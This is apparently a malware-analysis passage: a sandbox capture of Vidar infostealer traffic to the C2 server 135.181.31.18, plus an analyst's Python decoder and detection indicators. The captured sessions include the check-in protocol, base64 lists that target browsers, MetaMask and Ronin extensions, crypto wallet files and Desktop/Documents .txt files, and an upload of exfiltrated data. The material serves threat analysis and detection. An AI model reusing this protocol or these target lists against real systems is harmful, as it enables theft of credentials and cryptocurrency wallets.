    Connection: Keep-Alive
    Cache-Control: no-cache
2024-09-28 01:29:48 UTC | 8197 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74
    Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------CBFBKFIDHIDGHJKFBGHCCont
2024-09-28 01:29:49 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 28 Sep 2024 01:29:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-09-28 01:29:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0
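
The six sessions above are one complete Vidar check-in. The sample first issues GET / against the bare C2 IP (session 1), then POSTs a multipart body carrying the fields hwid and build_id (session 2) and is answered with a pipe-delimited config line whose fifth field is reused as the token form field in every later POST. Those token-bearing POSTs pull base64-encoded target lists (browser profile paths in session 3, extension identifiers in sessions 4 and 5), and the 8197-byte upload in session 6 is acknowledged with "ok". The decoder below is an added example for this page, not code from the Joe Sandbox report or from the malware. It works on the bodies shown in the capture: the hwid, build_id and token values, the config line and the base64 strings are the report's own; the CRLF framing of the multipart bodies is reconstructed from the hex dumps, because the report's ASCII view strips it; the session-3 POST body is rebuilt from the two fields the report shows, its truncated third part being left out; and no meaning is assigned to config fields other than the token, because the capture does not reveal one.

```python
"""Decoder for the Vidar C2 exchange captured above (added example)."""
import base64
import re

# Session 2 request body, reconstructed with CRLFs from the report's hex dump;
# the hwid and build_id values are the capture's own.
CHECKIN_BOUNDARY = "----AEGIJKEHCAKFCAKFHDAA"
CHECKIN_BODY = (
    "------AEGIJKEHCAKFCAKFHDAA\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    "A2DA9BDA0B0D2865866309-a33c7340-61ca\r\n"
    "------AEGIJKEHCAKFCAKFHDAA\r\n"
    'Content-Disposition: form-data; name="build_id"\r\n\r\n'
    "22857ff23603709764e7e7e3e4fd64bf\r\n"
    "------AEGIJKEHCAKFCAKFHDAA--\r\n"
)
# Session 2 response: chunked, pipe-delimited config line (verbatim).
CONFIG_RESPONSE = (
    b"3a\r\n1|1|1|1|3108c7c2bf1f0ac4d3c5bcc0d28a8c50|1|1|1|0|0|50000|1\r\n"
    b"0\r\n\r\n"
)
# Session 3 request body: only the two fields the report shows; the third
# part, cut off in the report, is left out.
TOKEN_BOUNDARY = "----DHCAAEBKEGHJKEBFHJDB"
TOKEN_BODY = (
    "------DHCAAEBKEGHJKEBFHJDB\r\n"
    'Content-Disposition: form-data; name="token"\r\n\r\n'
    "3108c7c2bf1f0ac4d3c5bcc0d28a8c50\r\n"
    "------DHCAAEBKEGHJKEBFHJDB\r\n"
    'Content-Disposition: form-data; name="build_id"\r\n\r\n'
    "22857ff23603709764e7e7e3e4fd64bf\r\n"
    "------DHCAAEBKEGHJKEBFHJDB--\r\n"
)
# Session 3 response: the first 184 base64 characters (three whole records)
# of the browser target list, as printed in the report.
BROWSER_LIST_B64 = (
    b"R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21l"
    b"fEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21l"
    b"fENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21l"
)
# Session 5 response, complete (chunked, base64 extension list).
EXTENSION_RESPONSE = (
    b"6c\r\nTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0"
    b"fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218\r\n0\r\n\r\n"
)


def parse_multipart(body: str, boundary: str) -> dict:
    """Map form-field names to values for a simple multipart/form-data body."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body (hex size, CRLF, data, CRLF, ... 0)."""
    out, pos = bytearray(), 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)    # ignore chunk extensions
        if size == 0:
            return bytes(out)
        out += raw[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                        # step over data + CRLF


def parse_config(line: bytes) -> dict:
    """Split the config line. Field 5 is the token the sample sends back as
    'token'; the capture gives no meaning for the other numeric fields, so
    they are returned as they are."""
    fields = line.decode().split("|")
    return {"token": fields[4], "other_fields": fields[:4] + fields[5:]}


def decode_list(b64: bytes, width: int) -> list:
    """Base64-decode a target list and group its pipe-separated fields into
    records of `width` fields (3 for both lists used here). A trailing empty
    field left by a final '|' is dropped."""
    fields = base64.b64decode(b64).decode().split("|")
    if fields and fields[-1] == "":
        fields.pop()
    return [tuple(fields[i:i + width]) for i in range(0, len(fields), width)]


def trace_exchange() -> dict:
    """Walk the captured sessions in order and verify the token handshake."""
    checkin = parse_multipart(CHECKIN_BODY, CHECKIN_BOUNDARY)
    config = parse_config(dechunk(CONFIG_RESPONSE))
    follow_up = parse_multipart(TOKEN_BODY, TOKEN_BOUNDARY)
    return {
        "hwid": checkin["hwid"],
        "build_id": checkin["build_id"],
        "token": config["token"],
        "token_replayed": follow_up["token"] == config["token"],
        "browsers": decode_list(BROWSER_LIST_B64, 3),
        "extensions": decode_list(dechunk(EXTENSION_RESPONSE), 3),
    }


if __name__ == "__main__":
    for key, value in trace_exchange().items():
        print(key, "=", value)
```

Running trace_exchange() on the capture reports token_replayed as true, which is the check to make before attributing later POSTs from the same host to the same infection. The three parsers apply unchanged to bodies exported from a PCAP of a live incident. The observable pattern the capture offers for detection is the fixed form-field names hwid, build_id and token, a Host header that is a bare IP address, and a Chrome/127 User-Agent with "Cache-Control: no-cache" on every request.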


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.7 | 49715       | 135.181.31.18  | 443              | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp: 2024-09-28 01:29:49 UTC | Bytes transferred: 305 | Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-09-28 01:29:49 UTC | Bytes transferred: 829 | Direction: OUT
Data Ascii:
------KFHCAEGCBFHJDGCBFHDA
Content-Disposition: form-data; name="token"

3108c7c2bf1f0ac4d3c5bcc0d28a8c50
------KFHCAEGCBFHJDGCBFHDA
Content-Disposition: form-data; name="build_id"

22857ff23603709764e7e7e3e4fd64bf
------KFHCAEGCBFHJDGCBFHDA
Cont

Timestamp: 2024-09-28 01:29:50 UTC | Bytes transferred: 158 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:29:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-09-28 01:29:50 UTC | Bytes transferred: 12 | Direction: IN
Data Ascii:
2
ok
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.7 | 49716       | 135.181.31.18  | 443              | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp: 2024-09-28 01:29:50 UTC | Bytes transferred: 305 | Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-09-28 01:29:50 UTC | Bytes transferred: 437 | Direction: OUT
Data Ascii:
------IEHJJECBKKECFIEBGCAK
Content-Disposition: form-data; name="token"

3108c7c2bf1f0ac4d3c5bcc0d28a8c50
------IEHJJECBKKECFIEBGCAK
Content-Disposition: form-data; name="build_id"

22857ff23603709764e7e7e3e4fd64bf
------IEHJJECBKKECFIEBGCAK
Cont

Timestamp: 2024-09-28 01:29:51 UTC | Bytes transferred: 158 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:29:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-09-28 01:29:51 UTC | Bytes transferred: 12 | Direction: IN
Data Ascii:
2
ok
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
9          | 192.168.2.7 | 49717       | 135.181.31.18  | 443              | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp: 2024-09-28 01:29:51 UTC | Bytes transferred: 305 | Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-09-28 01:29:51 UTC | Bytes transferred: 437 | Direction: OUT
Data Ascii:
------DHIJDHIDBGHJKECBFIID
Content-Disposition: form-data; name="token"

3108c7c2bf1f0ac4d3c5bcc0d28a8c50
------DHIJDHIDBGHJKECBFIID
Content-Disposition: form-data; name="build_id"

22857ff23603709764e7e7e3e4fd64bf
------DHIJDHIDBGHJKECBFIID
Cont

Timestamp: 2024-09-28 01:29:52 UTC | Bytes transferred: 158 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:29:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-09-28 01:29:52 UTC | Bytes transferred: 12 | Direction: IN
Data Ascii:
2
ok
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.7 | 49718       | 135.181.31.18  | 443              | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp: 2024-09-28 01:29:53 UTC | Bytes transferred: 305 | Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-09-28 01:29:53 UTC | Bytes transferred: 331 | Direction: OUT
Data Ascii:
------AEGIJKEHCAKFCAKFHDAA
Content-Disposition: form-data; name="token"

3108c7c2bf1f0ac4d3c5bcc0d28a8c50
------AEGIJKEHCAKFCAKFHDAA
Content-Disposition: form-data; name="build_id"

22857ff23603709764e7e7e3e4fd64bf
------AEGIJKEHCAKFCAKFHDAA
Cont

Timestamp: 2024-09-28 01:29:54 UTC | Bytes transferred: 158 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:29:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-09-28 01:29:54 UTC | Bytes transferred: 2228 | Direction: IN
Data Ascii:
8a8
Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
11         | 192.168.2.7 | 49719       | 135.181.31.18  | 443              | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp: 2024-09-28 01:29:54 UTC | Bytes transferred: 305 | Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-09-28 01:29:54 UTC | Bytes transferred: 331 | Direction: OUT
Data Ascii:
------HCFBFBAEBKJKEBGCAEHC
Content-Disposition: form-data; name="token"

3108c7c2bf1f0ac4d3c5bcc0d28a8c50
------HCFBFBAEBKJKEBGCAEHC
Content-Disposition: form-data; name="build_id"

22857ff23603709764e7e7e3e4fd64bf
------HCFBFBAEBKJKEBGCAEHC
Cont

Timestamp: 2024-09-28 01:29:55 UTC | Bytes transferred: 158 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:29:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-09-28 01:29:55 UTC | Bytes transferred: 195 | Direction: IN
Data Ascii:
b8
RE9XTkxPQURTfCVET1dOTE9BRFMlXHwqLnR4dHw1MHxmYWxzZXwqd2luZG93cyp8RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8REVTS1RPUHwlREVTS1RPUCVcfCoudHh0fDUwfHRydWV8KndpbmRvd3MqfA==
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
12         | 192.168.2.7 | 49720       | 135.181.31.18  | 443              | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp: 2024-09-28 01:29:56 UTC | Bytes transferred: 305 | Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 457
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-09-28 01:29:56 UTC | Bytes transferred: 457 | Direction: OUT
Data Ascii:
------KFHCAEGCBFHJDGCBFHDA
Content-Disposition: form-data; name="token"

3108c7c2bf1f0ac4d3c5bcc0d28a8c50
------KFHCAEGCBFHJDGCBFHDA
Content-Disposition: form-data; name="build_id"

22857ff23603709764e7e7e3e4fd64bf
------KFHCAEGCBFHJDGCBFHDA
Cont

Timestamp: 2024-09-28 01:29:57 UTC | Bytes transferred: 158 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:29:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-09-28 01:29:57 UTC | Bytes transferred: 12 | Direction: IN
Data Ascii:
2
ok
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49721 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:29:58 UTC | 308 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Content-Length: 129565
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-28 01:29:58 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74
Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------CGHCGIIDGDAKFIEBKFCFCont
2024-09-28 01:29:58 UTC | 16355 | OUT | Data Raw: 57 61 66 41 59 62 46 58 73 70 42 48 48 72 58 6c 33 69 43 77 2f 73 33 57 5a 72 62 79 31 6a 32 34 62 59 72 37 67 4d 6a 50 42 77 50 58 30 72 74 4c 50 58 4e 53 30 33 58 72 4b 77 75 4e 49 6a 30 37 52 35 33 65 31 74 6f 78 6a 63 48 42 34 59 34 39 54 2f 41 44 7a 7a 31 50 4e 65 4f 50 38 41 6b 62 4c 76 2f 64 6a 2f 41 50 51 42 58 58 6c 74 4f 56 4c 45 70 58 30 61 5a 35 32 63 54 68 56 77 6a 6c 62 56 4e 48 4f 55 63 55 74 4a 78 58 30 64 7a 35 49 4b 4b 4b 4b 41 4c 33 68 66 58 74 4d 30 33 78 4a 61 58 56 33 63 2b 58 42 48 76 33 4e 73 5a 73 5a 52 67 4f 41 4d 39 53 4b 39 49 2f 34 57 52 34 54 2f 41 4f 67 74 2f 77 43 53 38 76 38 41 38 54 58 6b 65 6a 36 44 61 61 70 34 56 31 75 2f 38 79 59 58 32 6e 68 4a 45 51 4d 4e 6a 49 54 7a 6b 59 7a 77 41 33 66 30 72 57 31 6a 77 4c 46 59 2b
Data Ascii: WafAYbFXspBHHrXl3iCw/s3WZrby1j24bYr7gMjPBwPX0rtLPXNS03XrKwuNIj07R53e1toxjcHB4Y49T/ADzz1PNeOP8AkbLv/dj/APQBXXltOVLEpX0aZ52cThVwjlbVNHOUcUtJxX0dz5IKKKKAL3hfXtM03xJaXV3c+XBHv3NsZsZRgOAM9SK9I/4WR4T/AOgt/wCS8v8A8TXkej6Daap4V1u/8yYX2nhJEQMNjITzkYzwA3f0rW1jwLFY+
2024-09-28 01:29:58 UTC | 16355 | OUT | Data Raw: 55 55 41 42 6f 6f 70 4b 59 42 51 61 4b 4b 42 69 55 55 70 70 4b 41 45 6f 70 61 53 6d 4d 4b 4b 4b 4b 41 43 6b 70 61 4f 61 41 45 78 53 55 76 61 69 6d 4d 53 69 67 30 55 41 4a 52 53 30 55 37 67 4a 52 52 69 6b 78 51 55 4c 6e 46 4f 45 68 37 38 6a 33 70 6c 46 4d 56 6b 50 2f 64 74 31 58 48 75 4b 62 35 49 50 33 58 2f 41 41 4e 4a 52 52 5a 44 31 47 4e 45 36 39 52 54 4b 73 42 79 4f 39 4b 58 44 66 65 55 47 6c 59 66 4d 79 74 52 55 35 6a 6a 62 6f 53 50 72 54 47 67 66 2b 48 35 68 37 55 72 46 4b 53 49 7a 53 48 70 53 6b 45 64 52 69 6a 6d 67 61 47 30 55 74 49 61 42 69 55 55 74 46 4d 59 6c 4a 53 30 55 42 63 53 6b 70 61 4b 42 6a 65 61 58 6d 69 67 30 44 45 4e 4a 53 30 6c 41 30 47 4b 53 6c 6f 4e 4d 42 43 4b 62 54 71 4d 55 44 47 69 67 30 76 46 4a 51 4d 51 30 6e 61 6e 55 6d 4b 51
Data Ascii: UUABoopKYBQaKKBiUUppKAEopaSmMKKKKACkpaOaAExSUvaimMSig0UAJRS0U7gJRRikxQULnFOEh78j3plFMVkP/dt1XHuKb5IP3X/AANJRRZD1GNE69RTKsByO9KXDfeUGlYfMytRU5jjboSPrTGgf+H5h7UrFKSIzSHpSkEdRijmgaG0UtIaBiUUtFMYlJS0UBcSkpaKBjeaXmig0DENJS0lA0GKSloNMBCKbTqMUDGig0vFJQMQ0nanUmKQ
2024-09-28 01:29:58 UTC | 16355 | OUT | Data Raw: 6c 47 4a 57 6b 51 6f 53 57 43 6e 47 51 79 67 37 52 78 31 7a 41 62 53 38 47 68 57 65 6a 69 33 55 4c 62 79 37 32 75 51 63 74 49 67 4c 46 49 79 50 52 57 6b 6b 50 2f 41 76 61 72 55 73 64 7a 64 66 36 66 54 30 56 6a 4e 77 79 7a 6c 33 58 6c 38 6b 74 2f 56 33 4e 31 43 57 6a 55 6e 71 51 44 53 34 72 50 61 2f 6c 2b 30 73 77 30 57 63 52 47 61 52 67 76 32 70 75 45 5a 63 49 75 66 39 6c 76 6d 7a 33 36 47 72 73 47 2f 79 45 33 35 33 59 35 7a 58 72 30 71 72 71 66 5a 61 39 54 77 4b 39 42 55 72 4e 53 54 76 32 48 30 55 55 56 73 63 34 47 6b 70 54 53 55 41 46 46 46 46 41 78 4f 61 57 69 69 67 41 70 4d 55 74 46 41 43 55 55 55 55 44 43 6b 70 61 4b 41 45 6f 6f 6f 6f 41 4b 53 67 30 55 78 68 52 52 52 54 41 4b 4b 4b 4f 39 41 43 55 55 74 4a 53 47 46 4a 53 30 55 77 45 6f 6f 4e 46 41 42
Data Ascii: lGJWkQoSWCnGQyg7Rx1zAbS8GhWeji3ULby72uQctIgLFIyPRWkkP/AvarUsdzdf6fT0VjNwyzl3Xl8kt/V3N1CWjUnqQDS4rPa/l+0sw0WcRGaRgv2puEZcIuf9lvmz36GrsG/yE353Y5zXr0qrqfZa9TwK9BUrNSTv2H0UUVsc4GkpTSUAFFFFAxOaWiigApMUtFACUUUUDCkpaKAEooooAKSg0UxhRRRTAKKKO9ACUUtJSGFJS0UwEooNFAB
2024-09-28 01:29:58 UTC | 16355 | OUT | Data Raw: 38 43 78 2b 62 34 4c 6d 58 79 2f 4d 2f 34 6d 4c 48 48 6c 37 2f 41 50 6c 6d 76 62 79 33 2f 6c 2b 50 72 36 65 62 66 37 73 2f 56 48 6d 5a 54 2f 76 4b 39 47 64 46 61 32 75 32 38 67 62 37 4c 74 78 49 70 7a 39 6d 78 6a 6e 31 2b 7a 6a 48 35 6a 36 69 75 46 31 72 2f 6b 50 61 68 2f 31 38 79 66 38 41 6f 52 72 76 37 48 54 58 61 61 4f 64 62 65 4a 56 53 51 45 37 6b 56 47 34 77 65 41 59 46 50 35 45 66 57 75 41 31 72 2f 6b 4f 36 68 2f 31 38 79 66 2b 68 47 76 4d 79 62 2b 4f 2f 54 39 55 64 50 45 6e 2b 36 78 2f 77 41 53 2f 4a 6c 47 69 69 69 76 70 44 34 6f 4b 4b 4b 4b 41 50 58 4c 62 2f 6a 7a 68 2f 33 46 2f 6c 54 6e 31 43 65 32 55 72 4e 70 38 37 51 59 2b 57 61 44 39 34 50 78 55 66 4d 50 77 42 71 4f 32 50 38 41 6f 6b 50 2b 34 76 38 41 4b 75 53 69 38 5a 53 36 64 34 7a 31 4b 32
Data Ascii: 8Cx+b4LmXy/M/4mLHHl7/APlmvby3/l+Pr6ebf7s/VHmZT/vK9GdFa2u28gb7LtxIpz9mxjn1+zjH5j6iuF1r/kPah/18yf8AoRrv7HTXaaOdbeJVSQE7kVG4weAYFP5EfWuA1r/kO6h/18yf+hGvMyb+O/T9UdPEn+6x/wAS/JlGiiivpD4oKKKKAPXLb/jzh/3F/lTn1Ce2UrNp87QY+WaD94PxUfMPwBqO2P8AokP+4v8AKuSi8ZS6d4z1K2
2024-09-28 01:29:58 UTC | 16355 | OUT | Data Raw: 46 39 66 77 2f 72 2b 72 68 2f 71 35 57 61 54 55 31 72 2b 76 38 41 58 35 39 69 78 52 57 54 42 71 64 7a 66 61 66 70 75 6f 58 4d 6d 6c 43 4f 65 5a 30 78 61 52 43 46 30 59 42 53 55 63 42 46 42 77 43 43 44 6c 75 70 35 72 54 45 30 54 48 43 79 6f 54 36 42 68 58 66 51 72 71 74 47 2b 78 35 47 4c 77 6b 73 50 50 6c 65 6f 2b 69 69 6b 56 67 4e 53 30 78 47 56 57 53 57 2b 67 6a 64 57 47 51 56 4c 67 45 45 56 72 4f 58 4a 46 79 37 48 50 53 67 36 6b 31 42 64 52 61 6a 6b 67 69 6c 49 4d 6b 53 50 6a 70 75 55 47 73 69 34 75 49 6b 30 44 58 4a 34 64 55 30 36 37 6d 68 73 33 65 4e 49 59 35 74 79 48 7a 6f 78 75 47 2b 4a 51 4d 41 6b 63 48 50 50 70 57 70 72 65 6f 57 31 72 72 74 37 65 52 32 36 4a 70 64 6f 38 77 75 6f 30 47 31 46 65 46 67 41 6e 48 54 7a 4e 30 51 48 75 35 39 44 58 6d 53
Data Ascii: F9fw/r+rh/q5WaTU1r+v8AX59ixRWTBqdzfafpuoXMmlCOeZ0xaRCF0YBSUcBFBwCCDlup5rTE0THCyoT6BhXfQrqtG+x5GLwksPPleo+iikVgNS0xGVWSW+gjdWGQVLgEEVrOXJFy7HPSg6k1BdRajkgilIMkSPjpuUGsi4uIk0DXJ4dU067mhs3eNIY5tyHzoxuG+JQMAkcHPPpWpreoW1rrt7eR26Jpdo8wuo0G1FeFgAnHTzN0QHu59DXmS
2024-09-28 01:29:58 UTC | 16355 | OUT | Data Raw: 67 61 44 78 54 63 35 70 4b 42 32 46 4c 65 31 4a 6b 30 6e 61 69 67 59 55 6c 4c 53 55 68 6f 4b 53 6c 70 44 51 4d 53 69 69 69 67 42 4b 4d 30 55 6c 41 77 70 4b 57 6b 6f 47 68 4b 4b 55 30 6c 41 78 4b 4b 4b 4b 42 69 47 6b 70 61 53 6d 4d 4b 53 6c 70 4b 42 6f 51 30 47 67 30 47 67 45 4a 53 55 47 67 30 46 42 53 55 70 70 76 61 67 61 46 70 4b 4b 4b 41 45 4e 4a 53 30 6c 42 51 47 6b 70 54 53 47 67 59 6c 4a 53 30 6c 41 78 4b 4b 44 52 6d 67 59 55 30 30 74 49 61 42 68 53 45 30 55 64 71 42 6f 53 6b 70 61 54 4e 41 41 65 6c 4a 6d 69 69 67 6f 44 30 70 4b 55 39 4b 62 7a 51 4d 55 2b 39 4e 70 63 30 6e 61 67 59 6e 46 42 6f 36 6d 69 67 42 4b 42 31 34 6f 6f 6f 4b 51 65 74 49 61 58 39 61 51 39 4f 74 41 78 4b 4d 30 47 6b 4a 39 36 42 68 6a 2f 4a 6f 36 55 55 33 74 54 42 43 2f 77 41 36
Data Ascii: gaDxTc5pKB2FLe1Jk0naigYUlLSUhoKSlpDQMSiiigBKM0UlAwpKWkoGhKKU0lAxKKKKBiGkpaSmMKSlpKBoQ0Gg0GgEJSUGg0FBSUppvagaFpKKKAENJS0lBQGkpTSGgYlJS0lAxKKDRmgYU00tIaBhSE0UdqBoSkpaTNAAelJmiigoD0pKU9KbzQMU+9Npc0nagYnFBo6migBKB14oooKQetIaX9aQ9OtAxKM0GkJ96Bhj/Jo6UU3tTBC/wA6
